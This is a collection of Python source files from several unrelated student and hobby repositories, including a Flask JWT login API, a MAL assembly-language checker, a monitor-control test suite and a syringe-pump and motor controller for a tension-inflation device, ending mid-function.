async def presentation_exchange_remove(request: web.BaseRequest):
"""
Request handler for removing a presentation exchange record.
Args:
request: aiohttp request object
"""
context = request.app["request_context"]
presentation_exchange_id = request.match_info["pres_ex_id"]
try:
presentation_exchange_record = await V10PresentationExchange.retrieve_by_id(
context, presentation_exchange_id
)
except StorageNotFoundError:
raise web.HTTPNotFound()
await presentation_exchange_record.delete_record(context)
return web.json_response({})
async def register(app: web.Application):
"""Register routes."""
app.add_routes(
[
web.get("/present-proof/records", presentation_exchange_list),
web.get(
"/present-proof/records/{pres_ex_id}", presentation_exchange_retrieve
),
web.get(
"/present-proof/records/{pres_ex_id}/credentials",
presentation_exchange_credentials_list,
),
web.get(
"/present-proof/records/{pres_ex_id}/credentials/{referent}",
presentation_exchange_credentials_list,
),
web.post(
"/present-proof/send-proposal", presentation_exchange_send_proposal,
),
web.post(
"/present-proof/send-request", presentation_exchange_send_free_request,
),
web.post(
"/present-proof/records/{pres_ex_id}/send-request",
presentation_exchange_send_bound_request,
),
web.post(
"/present-proof/records/{pres_ex_id}/send-presentation",
presentation_exchange_send_presentation,
),
web.post(
"/present-proof/records/{pres_ex_id}/verify-presentation",
presentation_exchange_verify_presentation,
),
web.post(
"/present-proof/records/{pres_ex_id}/remove",
presentation_exchange_remove,
),
]
)
``` |
{
"source": "joseph-brennan/concept-code",
"score": 4
} |
#### File: Python/practice_code/BMI calc.py
```python
class BMI:
def __init__(self):
self.weight = int(input("what is your weight? "))
self.height = 12 * int(input("what is your height in feet? "))
def calcBmi(self):
result = (self.weight * 703) / self.height ** 2
print("your BMI is {}".format(result))
if result < 18.5:
print("under weight")
elif result > 25:
print("over weight")
else:
print("optimal weight range")
if __name__ == '__main__':
bmi = BMI()
bmi.calcBmi()
```
#### File: Python/practice_code/ID.py
```python
class ID:
def __init__(self):
self.first = input("what is your first name? ")
self.last = input("what is your last name? ")
def output(self):
full = self.first + self.last
print("your full name is {} {} with initials {} {} with length of {}".format(
self.first, self.last, self.first[0], self.last[0], len(full)))
if __name__ == '__main__':
idname = ID()
idname.output()
``` |
{
"source": "joseph-brennan/cs3700",
"score": 3
} |
#### File: cs3700/hw1/hw1Server.py
```python
import os
import socket
import threading
class Server:
def __init__(self):
self.serverPort = 5010
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def connection(self):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(('', self.serverPort))
self.socket.listen(5)
print("The server is ready to receive")
while True:
connection_socket, address = self.socket.accept()
threading.Thread(self.loop(connection_socket, address)).start()
def loop(self, connection_socket, addresss):
str_header = connection_socket.recv(1024)
if str_header == "NULL":
connection_socket.close()
exit(0)
header = str_header.split('\n')
if header[0] == "Get":
# print header[0]
if os.path.isfile(header[1]):
# print header[1]
f = open(header[1], 'rb')
line = f.read(1024)
connection_socket.send(line)
# print line
if not line:
f.close()
self.socket.close()
else:
print("404 Not Found")
connection_socket.send("404 Not Found")
connection_socket.close()
else:
print("400 Bad Request")
connection_socket.send("400 Bad Request")
connection_socket.close()
if __name__ == '__main__':
server1 = Server()
server1.connection()
``` |
{
"source": "joseph-brennan/PPL",
"score": 3
} |
#### File: PPL/Mal_checking/MAL Checking.py
```python
import time
class MalChecking:
def __init__(self, file_name):
"""
initial set up of the language definition with the known syntax of MAL
:param file_name: name of the mall file to check
"""
# saved file name
self.file_name = file_name
try:
# open the Mal and log files
self.mal_file = open("{}.mal".format(file_name), 'r')
self.log = open("{}.log".format(file_name), 'w')
except FileNotFoundError or IOError:
print("File not found please enter MAL file in this directory")
exit(1)
# known instruction codes in MAL
self.instruction = {1: "BR", 2: "BGT", 3: "BLT", 4: "BEQ", 5: "DIV", 6: "MUL",
7: "DEC", 8: "SUB", 9: "INC", 10: "ADD", 11: "MOVEI", 12: "MOVE"}
# available registers in MAL
self.register = {1: "R0", 2: "R1", 3: "R2", 4: "R3", 5: "R4", 6: "R5", 7: "R6", 8: "R7"}
# each key corresponds to the line where the error takes place
# which holds the list of evey error in that line
self.errors = {}
# current list of errors on the line
# copied to error dictionary
self.list = []
# the full line of code unedited
self.print_line = {}
# tracks the line numbers and uses them for keys
self.count = 0
# list of labels in code
self.label = []
# list of branch to memory locations
self.branch = {}
# count of each error that occurred in file
self.error_count = {"ill-formed label": 0, "invalid op_code": 0, "too many operands": 0,
"too few operands": 0, "ill-formed operands": 0,
"wrong operand type": 0, "label warnings": 0}
def read_file(self):
"""
File parser where comments and blank lines are removed but line count is saved once the file has been read it
checks the branch against the labels and closes the file
:return: at end of file read and log write
"""
for i in self.mal_file:
line = i.strip()
self.count += 1
# blank line move forward
if line in ('\n', '\r\n', ''):
continue
# skip the comments
if line.startswith(";"):
continue
# known end of file
if line == "END":
break
else:
line = line.partition(';')
no_comment = i.partition(';')
self.print_line[self.count] = no_comment[0]
self.error_checking(line[0].strip())
self.branch_checker()
self.mal_file.close()
self.file_end()
def error_checking(self, line):
"""
where current line of code is handed down to all the error checking is saved all the error files
:param line: current line of non empty string
:return: when the line is finished the checks returns for next line in file
"""
self.bad_label(line)
self.errors[self.count] = self.list.copy()
self.list.clear()
def bad_label(self, line):
"""
checks for if there is a label and then verifies the label is valid
:param line: current line of code in its complete form
:return: has finished all error checks or there is only a label on the line
"""
label = line.partition(":")
# there is a label
if label[1] == ':':
# only a label
if label[2] == '':
if not label[0].isalpha():
self.list.append("** error: label can only contains letters")
self.error_count["ill-formed label"] += 1
elif len(label[0]) > 5:
self.list.append("** error: label can at most be 5 char long")
self.error_count["ill-formed label"] += 1
# valid label
else:
self.label.append(label[0])
return
# label on line
else:
if not label[0].isalpha():
self.list.append("** error: label can only contains letters")
self.error_count["ill-formed label"] += 1
elif len(label[0]) > 5:
self.list.append("** error: label can at most be 5 char long")
self.error_count["ill-formed label"] += 1
# valid label
else:
self.label.append(label[0])
self.invalid_op_code(label[2].strip())
return
# no label
else:
self.invalid_op_code(label[0].strip())
return
def invalid_op_code(self, line):
"""
current line of code without a label if there was one, verifies that the instruction code is a valid MAL one
:param line: current line of MAL without a label
:return: all checks have been preformed
"""
op_code = line.partition(" ")
if op_code[0] in self.instruction.values():
# valid op_code
self.bad_operands(line)
return
else:
self.list.append("** error: invalid op_code")
self.error_count["invalid op_code"] += 1
# now checking for more then one error
self.bad_operands(line)
return
def bad_operands(self, line):
"""
splits out the instruction from its operands and checks that the op_code has the right number of operands
:param line: instruction and its operands``
:return: this check and all deeper checks have been preformed
"""
op_code = line.partition(" ")
operand = op_code[2].split(",")
operands = []
for op in operand:
operands.append(op.strip())
switch = 0
if op_code[0] in self.instruction.values():
for key in self.instruction.keys():
if self.instruction.get(key) == op_code[0]:
switch = key
# BR, DEC, and INC
if switch in (1, 7, 9):
if len(operands) > 1:
self.list.append("** error: can only have one input for {}".format(
self.instruction.get(switch)))
self.error_count["too many operands"] += 1
elif len(operands) < 1:
self.list.append("** error: needs one input for {}".format(self.instruction.get(switch)))
self.error_count["too few operands"] += 1
# MOVEI and MOVE
elif switch in (11, 12):
if len(operands) > 2:
self.list.append("** error: can only have two arguments in {}".format(
self.instruction.get(switch)))
self.error_count["too many operands"] += 1
elif len(operands) < 2:
self.list.append("** error: needs two inputs for {}".format(self.instruction.get(switch)))
self.error_count["too few operands"] += 1
# BGT, BLT, BEQ, DIV, MUL, SUB, and ADD
elif switch in (2, 3, 4, 5, 6, 8, 10):
if len(operands) > 3:
self.list.append("** error: can only have three arguments in {}".format(
self.instruction.get(switch)))
self.error_count["too many operands"] += 1
elif len(operands) < 3:
self.list.append("** error: needs three inputs for {}".format(self.instruction.get(switch)))
self.error_count["too few operands"] += 1
self.wrong_operands(op_code[0], operands)
return
def wrong_operands(self, op_code, operand):
"""
using the work performed before to separate the instruction from its operands
it checks each type of operand in the instruction is the correct type
:param op_code: the instruction
:param operand: the operands for the instruction
:return: this and the last error check have been performed
"""
switch = 0
for key in self.instruction.keys():
if self.instruction.get(key) == op_code:
switch = key
# Move
if switch == 12:
try:
self.source_check(operand[0])
try:
self.destination_check(operand[1])
except IndexError:
self.list.append("** error: no destination")
self.error_count["ill-formed operands"] += 1
except IndexError:
self.list.append("** error: no source")
self.list.append("** error: no destination")
self.error_count["ill-formed operands"] += 1
# MOVEI
elif switch == 11:
try:
self.immediate_check(operand[0])
try:
self.destination_check(operand[1])
except IndexError:
self.list.append("** error: no destination")
self.error_count["ill-formed operands"] += 1
except IndexError:
self.list.append("** error: no source")
self.list.append("** error: no destination")
self.error_count["ill-formed operands"] += 1
# ADD or SUB or MUL or DIV
elif switch in (10, 8, 6, 5):
try:
self.source_check(operand[0])
try:
self.source_check(operand[1])
try:
self.destination_check(operand[2])
except IndexError:
self.list.append("** error: missing destination")
self.error_count["ill-formed operands"] += 1
except IndexError:
self.list.append("** error: second source missing")
self.list.append("** error: missing destination")
self.error_count["ill-formed operands"] += 1
except IndexError:
self.list.append("** error: first source missing")
self.list.append("** error: second source missing")
self.list.append("** error: missing destination")
self.error_count["ill-formed operands"] += 1
# INC or DEC
elif switch in (9, 7):
try:
self.source_check(operand[0])
except IndexError:
self.list.append("** error: missing source")
self.error_count["ill-formed operands"] += 1
# BEQ or BLT or BGT
elif switch in (4, 3, 2):
try:
self.source_check(operand[0])
try:
self.source_check(operand[1])
try:
self.label_check(operand[2])
except IndexError:
self.list.append("** error: missing label")
self.error_count["ill-formed operands"] += 1
except IndexError:
self.list.append("** error: missing second source")
self.list.append("** error: missing label")
self.error_count["ill-formed operands"] += 1
except IndexError:
self.list.append("** error: missing first source")
self.list.append("** error: missing second source")
self.list.append("** error: missing label")
self.error_count["ill-formed operands"] += 1
# BR
elif switch == 1:
try:
self.label_check(operand[0])
except IndexError:
self.list.append("** error: no label")
self.error_count["ill-formed operands"] += 1
self.warning_label(op_code, operand)
def warning_label(self, op_code, operand):
"""
If there is a branch instruction add it to a dictionary keyed by the line number where the
instruction is found so at the end of the file it can be compared to the list of labels seen in the file
:param op_code: what should be a branch instruction
:param operand: the operands of the instruction
:return: after saving the branch label for the end of the file
"""
# BR
if op_code == self.instruction.get(1):
try:
self.branch[self.count] = operand[0]
except IndexError:
pass
# BGT or BLT or BEQ
elif op_code in (self.instruction.get(4), self.instruction.get(3), self.instruction.get(2)):
try:
self.branch[self.count] = operand[2]
except IndexError:
pass
# check of source correctness
def source_check(self, source):
"""
checks that source operands are of the right type
:param source: a source operand
:return: after checking and writing to an error if it found one
"""
if source[0] == "R" and source[1].isdigit():
if source not in self.register.values():
self.list.append("** error: registers are only between 0 and 7")
self.error_count["wrong operand type"] += 1
return
elif source.lower().isalpha() is False:
self.list.append("** error: source can only contains letters")
self.error_count["wrong operand type"] += 1
return
elif len(source) > 5:
self.list.append("** error: source can at most be 5 char long")
self.error_count["wrong operand type"] += 1
return
# check of destination correctness
def destination_check(self, destination):
"""
check that the destination operands are of teh right type
(almost the same as the source but it has different error code to be more useful)
:param destination: a destination operand
:return: after checking and writing its error if it found one
"""
if destination[0] == "R" and destination[1].isdigit():
if destination not in self.register.values():
self.list.append("** error: registers are only between 0 and 7")
self.error_count["wrong operand type"] += 1
return
elif destination.isalpha() is False:
self.list.append("** error: destination can only contains letters")
self.error_count["wrong operand type"] += 1
return
elif len(destination) > 5:
self.list.append("** error: destination can at most be 5 char long")
self.error_count["wrong operand type"] += 1
return
# check of integer value
def immediate_check(self, immediate):
"""
checks that there is an octal immediate value
:param immediate: what should be an octal number
:return: after checking and writing an error if found
"""
if immediate.isdigit():
for number in immediate:
if int(number) > 7:
self.list.append("** error: number {} is not in octal format".format(number))
self.error_count["wrong operand type"] += 1
return
return
else:
self.list.append("** error: immediate value expected not register or memory location")
self.error_count["wrong operand type"] += 1
return
# check of label to branch
def label_check(self, label):
"""
check that a branch label is a valid memory location and later the label is checked for if the
label is a label in the code
:param label: a memory location
:return: checks that the label and rights an error if found
"""
if not label.isalpha():
self.list.append("** error: {} memory location can only contains letters".format(label))
self.error_count["wrong operand type"] += 1
return
elif len(label) > 5:
self.list.append("** error: label {} can at most be 5 char long".format(label))
self.error_count["wrong operand type"] += 1
return
def branch_checker(self):
"""
checks the valid labels in the code against the branch instruction labels after the whole file
as been read for the final error check
:return: after writing a error if the label branching to doesn't exist
"""
for key in self.branch.keys():
if self.branch.get(key) not in self.label:
self.errors[key].append("** error: branch {} is to label that isn't defined".format(
self.branch.get(key)))
self.error_count["label warnings"] += 1
else:
continue
def file_end(self):
"""
this writes to the log file all the information that the error checking has done
:return: finished witting and closed the log filed
"""
self.log.write("MAL File Checker for: {}.mal log file, named {}.log, {}, By <NAME> CS 3210\n".format(
self.file_name, self.file_name, time.ctime()))
self.log.write("-------------------------------------------------------\n")
self.log.write("MAL Program Listing:MAL Program Listing:\n\n")
true_count = 0
for line in sorted(self.print_line.keys()):
true_count += 1
self.log.write("{}: {}\n".format(line, self.print_line.get(line)))
if line in self.errors.keys():
for error in self.errors.get(line):
self.log.write("{}\n".format(error))
self.log.write('\n')
self.log.write("-------------------------------------------------------\n")
count = 0
for key in sorted(self.error_count.keys()):
count += self.error_count.get(key)
self.log.write("total lines of code = {}\ntotal errors = {}\n".format(true_count, count))
for key in sorted(self.error_count.keys()):
self.log.write("{} {}\n".format(self.error_count.get(key), key))
self.log.write("Processing complete: ")
if count > 0:
self.log.write("MAL program is not valid.")
else:
self.log.write("MAL program is valid.")
self.log.close()
if __name__ == '__main__':
while True:
name = input("what is the name of the MAL file? ")
mal = MalChecking(name)
mal.read_file()
loop = input("Would you like to check another file Y/n? ")
if loop.lower() in ("no", "n"):
break
elif loop.strip() == "":
continue
elif loop.lower() not in ("yes", "y"):
print("error not a valid input shutting down")
exit(1)
else:
continue
``` |
{
"source": "joseph-brennan/smoke",
"score": 3
} |
#### File: smoke_backend/auth/views.py
```python
from flask import request, jsonify, Blueprint
from flask_jwt_extended import (
create_access_token,
create_refresh_token,
jwt_refresh_token_required,
jwt_required,
get_jwt_identity,
get_raw_jwt
)
from smoke_backend.models import User
from smoke_backend.extensions import pwd_context, jwt
blacklist = set()
blueprint = Blueprint('auth', __name__, url_prefix='/auth')
@blueprint.route('/login', methods=['POST'])
def login():
"""Authenticate user and return token.
Uses flask's jsonify function to convert requests to valid JSON objects.
[fjsonify]_
Return:
flask.Response: If valid request & credentials present, returns the
valid access tokens for the backend in JSON format.
If the user password or username is missing or invalid, then method
returns a JSON formatted message noting how the method failed.
.. _Flask Local Proxy Request through werkzeug local:
http://werkzeug.pocoo.org/docs/0.14/wrappers/
"""
if not request.is_json:
return jsonify({"msg": "Missing JSON in request"}), 400
username = request.json.get('username', None)
password = request.json.get('password', None)
if not username or not password:
return jsonify({"msg": "Missing username or password"}), 400
user = User.query.filter_by(username=username).first()
if user is None or not pwd_context.verify(password, user.password):
return jsonify({"msg": "Bad credentials"}), 400
access_token = create_access_token(identity=user.id)
refresh_token = create_refresh_token(identity=user.id)
ret = {
'access_token': access_token,
'refresh_token': refresh_token
}
return jsonify(ret), 200
@blueprint.route('/refresh', methods=['POST'])
@jwt_refresh_token_required
def refresh():
"""Receives access token and refreshes the page.
Requires a valid jwt token for access to method. [fjwtfresh]_
Returns:
flask.response: A JSONified object containing the updated contents of
the login page. [fjsonify]_
"""
current_user = get_jwt_identity()
ret = {
'access_token': create_access_token(identity=current_user)
}
return jsonify(ret), 200
@blueprint.route('/logout', methods=['DELETE'])
@jwt_required
def logout():
jti = get_raw_jwt()['jti']
blacklist.add(jti)
return jsonify({"msg": "Successfully logged out"}), 200
@jwt.user_loader_callback_loader
def user_loader_callback(identity):
"""Returns user information.
Parameters:
identity: The unique identifier for the user.
Returns:
flask.response: The user data as a JSON dictionary.
"""
return User.query.get(identity)
```
#### File: smoke-backend/smoke_backend/manage.py
```python
import click
from flask.cli import FlaskGroup
from smoke_backend.app import create_app
def create_smoke(info):
"""Get application from application factory method.
Parameters:
info (str): Currently not used.
Returns:
Flask: The Flask [f]_ controller object for the backend
"""
return create_app(cli=True)
@click.group(cls=FlaskGroup, create_app=create_smoke)
def cli():
"""Main entry point
Forms the entry point for when this method is called as a stand-alone
application.
"""
@cli.command("init")
def init():
"""Initialize application
Initializes the SQLAlchemy [flasksqla]_ database and adds a default user.
"""
from smoke_backend.extensions import db
click.echo("drop old database")
db.reflect()
db.drop_all()
click.echo("create database")
db.create_all()
click.echo("done")
@cli.command("seed")
def seed():
"""Seeds the database with the standard privilege values.
Relative values noted here are in *descending order*, in that a relative
privilege value of 3 is the highest value.
Function also initializes the default user, with a privilege value of
Admin (3).
Values:
Student: User which defines the code to test. (Relative value: 1)
Teacher: User which defines the test cases. (Relative value: 2)
Admin: User which has complete access. (Relative value 3)
"""
from smoke_backend.extensions import db
from smoke_backend.models import Privilege, User
privilege1 = Privilege(permission_level="STUDENT")
privilege2 = Privilege(permission_level="TEACHER")
privilege3 = Privilege(permission_level="ADMIN")
click.echo("create priveledges")
db.session.add(privilege1)
db.session.add(privilege2)
db.session.add(privilege3)
db.session.commit()
click.echo("create user admin")
user = User(
username='admin',
email='<EMAIL>',
password='<PASSWORD>',
active=True,
privilege=Privilege.query.get(3)
)
db.session.add(user)
db.session.commit()
click.echo("done")
if __name__ == "__main__":
cli()
``` |
{
"source": "JosephBrooksbank/monitorcontrol",
"score": 3
} |
#### File: monitorcontrol/vcp/vcp_abc.py
```python
import abc
from types import TracebackType
from typing import Optional, Tuple, Type
class VCPError(Exception):
""" Base class for all VCP related errors. """
pass
class VCPIOError(VCPError):
""" Raised on VCP IO errors. """
pass
class VCPPermissionError(VCPError):
""" Raised on VCP permission errors. """
pass
class VCP(abc.ABC):
@abc.abstractmethod
def __enter__(self):
pass
@abc.abstractmethod
def __exit__(
self,
exception_type: Optional[Type[BaseException]],
exception_value: Optional[BaseException],
exception_traceback: Optional[TracebackType],
) -> Optional[bool]:
pass
@abc.abstractmethod
def set_vcp_feature(self, code: int, value: int):
"""
Sets the value of a feature on the virtual control panel.
Args:
code: Feature code.
value: Feature value.
Raises:
VCPError: Failed to set VCP feature.
"""
pass
@abc.abstractmethod
def get_vcp_feature(self, code: int) -> Tuple[int, int]:
"""
Gets the value of a feature from the virtual control panel.
Args:
code: Feature code.
Returns:
Current feature value, maximum feature value.
Raises:
VCPError: Failed to get VCP feature.
"""
pass
```
#### File: monitorcontrol/tests/test_monitorcontrol.py
```python
from monitorcontrol import vcp
from monitorcontrol.monitorcontrol import (
InputSource,
get_monitors,
get_vcps,
Monitor,
)
from types import TracebackType
from typing import Iterable, List, Optional, Tuple, Type, Union
import pytest
from unittest import mock
# set to true to run the unit test on your monitors
USE_ATTACHED_MONITORS = False
class UnitTestVCP(vcp.VCP):
def __init__(self, vcp_dict: dict):
self.vcp = vcp_dict
def set_vcp_feature(self, code: int, value: int):
self.vcp[code]["current"] = value
def get_vcp_feature(self, code: int) -> Tuple[int, int]:
return self.vcp[code]["current"], self.vcp[code]["maximum"]
def get_vcp_capabilities(self):
# example string from Acer VG271U
# does not necessarily align with other test code.
# Reported capabilities could be different.
return (
"(prot(monitor)type(LCD)model(ACER VG271U)cmds(01 02 03 07 0C"
" E3 F3)vcp(04 10 12 14(05 06 08 0B) 16 18 1A 59 5A 5B 5C 5D"
" 5E 60(0F 11 12)62 9B 9C 9D 9E 9F A0 D6 E0(00 04 05 06) E1(00"
" 01 02)E2(00 01 02 03 05 06 07 0B 10 11 12)E3 E4 E5 E7(00 01"
" 02) E8(00 01 02 03 04)) mswhql(1)asset_eep(40)mccs_ver(2.2))"
)
def __enter__(self):
pass
def __exit__(
self,
exception_type: Optional[Type[BaseException]],
exception_value: Optional[BaseException],
exception_traceback: Optional[TracebackType],
) -> Optional[bool]:
pass
def test_context_manager_assert():
m = Monitor(None)
with pytest.raises(AssertionError):
m.get_power_mode()
def test_get_vcps():
get_vcps()
def test_get_monitors():
get_monitors()
def get_test_vcps() -> List[Type[vcp.VCP]]:
if USE_ATTACHED_MONITORS:
return get_vcps()
else:
unit_test_vcp_dict = {
0x10: {"current": 50, "maximum": 100},
0xD6: {"current": 1, "maximum": 5},
0x12: {"current": 50, "maximum": 100},
0x60: {"current": "HDMI1", "maximum": 3},
}
return [UnitTestVCP(unit_test_vcp_dict)]
@pytest.fixture(scope="module", params=get_test_vcps())
def monitor(request) -> Iterable[Monitor]:
monitor = Monitor(request.param)
with monitor:
yield monitor
def test_get_code_maximum_type_error(monitor: Monitor):
code = vcp.VCPCode("image_factory_default")
with pytest.raises(TypeError):
monitor._get_code_maximum(code)
def test_set_vcp_feature_type_error(monitor: Monitor):
code = vcp.VCPCode("active_control")
with pytest.raises(TypeError):
monitor._set_vcp_feature(code, 1)
def test_get_vcp_feature_type_error(monitor: Monitor):
code = vcp.VCPCode("image_factory_default")
with pytest.raises(TypeError):
monitor._get_vcp_feature(code)
@pytest.mark.parametrize(
"luminance, expected", [(100, 100), (0, 0), (50, 50), (101, ValueError)]
)
def test_luminance(
monitor: Monitor, luminance: int, expected: Union[int, Type[Exception]]
):
original = monitor.get_luminance()
try:
if isinstance(expected, int):
monitor.set_luminance(luminance)
assert monitor.get_luminance() == expected
elif isinstance(expected, type(Exception)):
with pytest.raises(expected):
monitor.set_luminance(luminance)
finally:
monitor.set_luminance(original)
@pytest.mark.skipif(
USE_ATTACHED_MONITORS, reason="not going to change your contrast"
)
def test_contrast(monitor: Monitor):
contrast = monitor.get_contrast()
contrast += 1
monitor.set_contrast(contrast)
assert monitor.get_contrast() == contrast
@pytest.mark.skipif(
USE_ATTACHED_MONITORS, reason="not going to turn off your monitors"
)
@pytest.mark.parametrize(
"mode, expected",
[
# always recoverable for real monitors
("on", 0x01),
(0x01, 0x01),
("INVALID", AttributeError),
(["on"], TypeError),
(0x00, ValueError),
(0x06, ValueError),
# sometimes recoverable for real monitors
("standby", 0x02),
("suspend", 0x03),
("off_soft", 0x04),
# rarely recoverable for real monitors
("off_hard", 0x05),
],
)
def test_power_mode(
monitor: Monitor,
mode: Union[str, int],
expected: Union[int, Type[Exception]],
):
if isinstance(expected, (int, str)):
monitor.set_power_mode(mode)
power_mode = monitor.get_power_mode().value
if expected != 0x01:
# Acer XF270HU empirical testing: monitor reports zero when in any
# power mode that is not on
assert power_mode == expected or power_mode == 0x00
else:
assert monitor.get_power_mode().value == expected
elif isinstance(expected, type(Exception)):
with pytest.raises(expected):
monitor.set_power_mode(mode)
# ASUS VG27A when set to a mode that doesnt exist returnd analog1 (0x1)
@pytest.mark.skipif(
USE_ATTACHED_MONITORS, reason="Real monitors dont support all input types"
)
@pytest.mark.parametrize(
"mode, expected",
[
(InputSource.ANALOG1, 0x01),
(InputSource.ANALOG2, 0x02),
(InputSource.DVI1, 0x03),
(InputSource.DVI2, 0x04),
(InputSource.COMPOSITE1, 0x05),
(InputSource.COMPOSITE2, 0x06),
(InputSource.SVIDEO1, 0x07),
(InputSource.SVIDEO2, 0x08),
(InputSource.TUNER1, 0x09),
(InputSource.TUNER2, 0x0A),
(InputSource.TUNER3, 0x0B),
(InputSource.CMPONENT1, 0x0C),
(InputSource.CMPONENT2, 0x0D),
(InputSource.CMPONENT3, 0x0E),
(InputSource.DP1, 0x0F),
(InputSource.DP2, 0x10),
(InputSource.HDMI1, 0x11),
(InputSource.HDMI2, 0x12),
],
)
def test_input_source(
monitor: Monitor,
mode: Union[str, int],
expected: Tuple[InputSource, int],
):
monitor.set_input_source(mode)
read_source = monitor.get_input_source()
assert read_source == mode
@pytest.mark.skipif(
USE_ATTACHED_MONITORS, reason="No value in testing this with real monitors"
)
def test_input_source_issue_59(monitor: Monitor):
"""
Some monitors seem to duplicate the low byte (input source)
to the high byte (reserved).
See https://github.com/newAM/monitorcontrol/issues/59
"""
with mock.patch.object(monitor, "_get_vcp_feature", return_value=0x1010):
input_source = monitor.get_input_source()
assert input_source == InputSource.DP2
def test_get_vcp_capabilities(monitor: Monitor):
monitors_dict = monitor.get_vcp_capabilities()
model = monitors_dict["model"]
inputs = monitors_dict["inputs"]
print(inputs)
if model != "ACER VG271U":
raise AssertionError("Could not parse model")
if set(inputs) != {"DP1", "HDMI1", "HDMI2"}:
raise AssertionError("Could not parse input sources")
``` |
{
"source": "JosephBrunet/tension_inflation",
"score": 2
} |
#### File: JosephBrunet/tension_inflation/setup.py
```python
from setuptools import setup, find_packages
import os.path
# The directory containing this file
HERE = os.path.abspath(os.path.dirname(__file__))
# The text of the README file
with open(os.path.join(HERE, "README.md")) as fid:
README = fid.read()
def package_files(directory):
paths = []
for (path, directories, filenames) in os.walk(directory):
for filename in filenames:
paths.append(os.path.join('..', path, filename))
return paths
extra_files = package_files(HERE+'/tension_inflation/resources')
print(extra_files)
setup(name='tension_inflation',
version='1.0.0',
description='Software controlling the tension-inflation device',
long_description=README, # Optional
long_description_content_type='text/markdown',
url='https://github.com/JosephBrunet/tension_inflation.git',
author='<NAME>',
author_email='<EMAIL>',
license='MIT',
package_dir={'': 'tension_inflation'},
packages=find_packages(where='tension_inflation'),
package_data={'': extra_files},
python_requires='>=3',
install_requires=['PyQt5','pyserial','pyqtgraph','simple-pid','PIPython'],
entry_points={
'gui_scripts':['tension_inflation=tension_inflation.GUI_main:main',],
'console_scripts': ['tension_inflation_console=tension_inflation.GUI_main:main',],
},
)
```
#### File: modules/mainwindow_modules/CommandThread.py
```python
from PyQt5 import QtCore, QtWidgets
from PyQt5.QtCore import QSize, Qt, QRegExp, QThread, QThreadPool, QObject, pyqtSignal
import numpy as np #For mathematics
import time
from tension_inflation.modules.sensors_dialogs import MotorPI #Program to control the axial motor
from tension_inflation.modules.sensors_dialogs import Arduino #Program created to connect / read... with the arduino microcontrol
from tension_inflation.modules.sensors_dialogs import Pump_seringe #Program to control the pump
from simple_pid import PID
class CommandThread(QThread):
"""Command Motor and then Pump"""
signal_end = pyqtSignal() #Connecting the signals
update_thread = QtCore.pyqtSignal()
def __init__(self, dF_target, PV_target, NcycleF, NcycleP, PVmode, FDmode):
super(QThread, self).__init__()
#Defining the variables pass to the thread from the test window
self.pause = False
self.dF_target = dF_target
self.PV_target = PV_target
self.NcycleF = NcycleF
self.NcycleP = NcycleP
self.PVmode = PVmode
self.FDmode = FDmode
self.flowRate = float(Pump_seringe.getFlowRate())
self.P = False
self.F = False
def stop(self):
"""
Stop the thread
"""
self.pause = True
try:
MotorPI.stop()
except:
print("CommandThread motor")
try:
Pump_seringe.stop()
except:
print("CommandThread pump")
def update_value(self,F,P):
"""
Update the values of load and pressure
"""
self.F=F
self.P=P
def DisplacementControl(self):
#Cycles first
if self.NcycleF != 0:
cycle=0
while cycle < self.NcycleF:
MotorPI.move_rel(self.dF_target)
while MotorPI.ismoving():
#print("motor running")
time.sleep(0.1)
if self.pause == True:
return
MotorPI.move_rel(-self.dF_target)
while MotorPI.ismoving():
time.sleep(0.1)
cycle = cycle +1
if self.pause:
return
MotorPI.move_rel(self.dF_target)
while MotorPI.ismoving():
time.sleep(0.1)
def LoadControl(self):
self.update_thread.emit()
while self.F == False:
time.sleep(0.1)
while self.F < self.dF_target*0.9 or self.F > self.dF_target*1.1 :
self.update_thread.emit()
if self.F < self.dF_target*0.9:
MotorPI.move_rel(0.2)
while MotorPI.ismoving():
time.sleep(0.1)
if self.F > self.dF_target*1.1:
MotorPI.move_rel(-0.2)
while MotorPI.ismoving():
time.sleep(0.1)
self.update_thread.emit()
time.sleep(0.5)
def VolumeControl(self):
#Cycles first
if self.NcycleP != 0:
cycle=0
while cycle < self.NcycleP:
Pump_seringe.dose(self.PV_target)
waitingTime = abs(float(self.PV_target) / float(Pump_seringe.getFlowRate()))*60 + 2
print(str(waitingTime))
time.sleep(waitingTime)
Pump_seringe.dose(-self.PV_target)
waitingTime = abs(float(self.PV_target) / float(Pump_seringe.getFlowRate()))*60 + 2
print(str(waitingTime))
time.sleep(waitingTime)
cycle = cycle +1
Pump_seringe.dose(self.PV_target)
waitingTime = abs(float(self.PV_target) / float(Pump_seringe.getFlowRate()))*60 + 1
print(str(waitingTime))
time.sleep(waitingTime)
def PressureControl(self):
Pump_seringe.set_vol(500) #Set target volume of the pump to not stop the run inadvertently
if self.P > self.PV_target:
self.NcycleP=0
self.update_thread.emit()
#Cycles first
if self.NcycleP != 0:
cycle=0
while cycle < self.NcycleP:
#Cycle montant
pump_running = False
flag= False
while self.pause == False and flag == False:
self.update_thread.emit()
if self.P > self.PV_target:
Pump_seringe.stop()
pump_running = False
flag = True
if pump_running == False and flag == False:
Pump_seringe.run()
pump_running = True
time.sleep(0.05)
time.sleep(0.05)
#Cycle descendant
pump_running = False
flag= False
while self.pause == False and flag == False:
self.update_thread.emit()
if self.P <= 1:
Pump_seringe.stop()
pump_running = False
flag = True
if pump_running == False and flag == False:
Pump_seringe.run_reverse()
pump_running = True
time.sleep(0.05)
cycle = cycle +1
print("Go to "+str(self.PV_target))
time.sleep(0.05)
#MANAGE PRESSION INFERIOR TO TARGET
if self.P < self.PV_target:
Pump_seringe.run()
while self.pause == False and self.P < self.PV_target*0.98:
self.update_thread.emit()
time.sleep(0.1)
Pump_seringe.stop()
pid = PID(1, 0.1, 0.05, setpoint=self.PV_target)
pid.sample_time = 0.1 # update every 0.01 seconds
pid.output_limits = (0, 5)
start = time.time()
while self.pause == False:
self.update_thread.emit()
# compute new ouput from the PID according to the systems current value
output = pid(self.P)
print("Pump flow rate: "+str(output))
if time.time() - start > 0.5:
# feed the PID output to the system and get its current value
Pump_seringe.stop()
Pump_seringe.setFlowRate(output)
Pump_seringe.run()
start = time.time()
time.sleep(0.01)
time.sleep(0.01)
Pump_seringe.stop()
Pump_seringe.setFlowRate(self.flowRate)
#MANAGE PRESSURE SUPERIOR TO TARGET
elif self.P > self.PV_target:
pump_running = False
flag= False
Pump_seringe.setFlowRate(self.flowRate)
while self.pause == False and flag == False:
self.update_thread.emit()
